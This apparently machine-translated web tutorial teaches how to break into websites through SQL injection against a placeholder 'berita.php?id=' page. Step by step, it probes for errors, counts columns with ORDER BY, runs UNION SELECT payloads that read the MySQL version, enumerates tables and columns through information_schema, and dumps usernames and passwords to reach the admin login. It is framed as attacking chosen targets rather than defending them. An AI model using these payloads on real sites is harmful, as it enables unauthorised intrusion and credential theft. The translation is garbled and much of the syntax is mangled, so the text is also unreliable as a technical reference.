How to Hacking Website With SQL Injection TechniquesUnderstanding SQL Injection, SQL Injection is an action applied client hacking is done by modifying the SQL commands that exist in memory and the client application is also a technique of exploiting web applications that use a database for storing therein data.I need to know before doing SQL Injection in MySQL:character: 'or -comments: / * or -information_schema for version: MySQL version 5.x, no support for MySQL version 4.x[Step 1]

Look for a target

For example: [site] / berita.php? Id = 100

Add character 'at the end of the url or add character "-" to see if there is an error message.


[Site] / berita.php? Id = 100 'or

[Site] / berita.php? Id = -100

So that the error message as follows [many more][Step 2]

Finding and counting the number of tables that exist in the database ...

use the command: order by


[Site] / berita.php? Id = -100 + order + by +1- - or

[Site] / berita.php? Id = -100 + order + by +1 / *

Please check it step by step (satupersatu) ...

For example:

[Site] / berita.php? Id = -100 + order + by +1- -

[Site] / berita.php? Id = -100 + order + by +2- -

[Site] / berita.php? Id = -100 + order + by +3- -

[Site] / berita.php? Id = -100 + order + by +4- -

So that there is an error or missing error message ...

For example: [site] / berita.php? Id = -100 + order + by +9- -

Means that we take is to figure 8

Being a [site] / berita.php? Id = -100 + order + by +8- -[Step 3]

how to remove the numbers that appear use the union

because it was error to figure 9

then: [site] / berita.php? id = -100 + union + select +1,2,3,4,5,6,7,8 -

ok is like that out number 5

use the version () or @ @ version to check which version of sql command input diapakai TSB on nagka who came out earlier

eg: [site] / berita.php? id = -100 + union + select +1,2,3,4, version () ,6,7,8 - or

[Site] / berita.php? Id = -100 + union + select +1,2,3,4, @ @ version ,6,7,8 -

See the version used se'umpama version 4 left alone because in version 4 we have to guess at his own table and column that exist on the web because they can not use command + From INFORMATION_SCHEMA ..

For version 5 you are lucky, no need to guess table and column as version 4 as in version 5 can use command + From INFORMATION_SCHEMA ..[Step 4]

To display the table that is on the web is

table_name command >>> included in figures out last yangg

command + from + information_schema.tables / * >>> inserted after the last digit


[Site] / berita.php? Id = -100 + union + select +1,2,3,4, table_name, 6,7,8 + from + information_schema.tables--

Se'umpama table that appears is "admin"[Step 5]

to display all the contents of the table is

command group_concat (table_name) >>> included in the figures that came out earlier

command + from + information_schema.tables + where + table_schema = database () >>> inserted after the last digit

[Step 6]

Command group_concat (column_name) >>> included in the figures that came out earlier

information_schema.columns + orders + from + where + table_name = 0xhexa - >>> inserted after the last digit

At this stage you shall mengextrak word on the contents of a table that is by converting hexadecimal

Websites which are used for the conversion:


Examples of words you want to convert the admin then it will be 61646D696E

[Step 7]

Bring up what had been excluded from the table that is the way

concat_ws command (0x3a, column contents result that would be issued) >>> included in the figures that came out earlier

command + from + (derived table name) >>> inserted after the last digit


[Site] / berita.php? Id = -100 + union + select +1,2,3,4, concat_ws (0x3a, result column contents), 6,7,8 + from + (name derived table) -

Example is the word that comes out id, username, password


[Step 8]

The last stage for admin or login page.

Ok thnks finish

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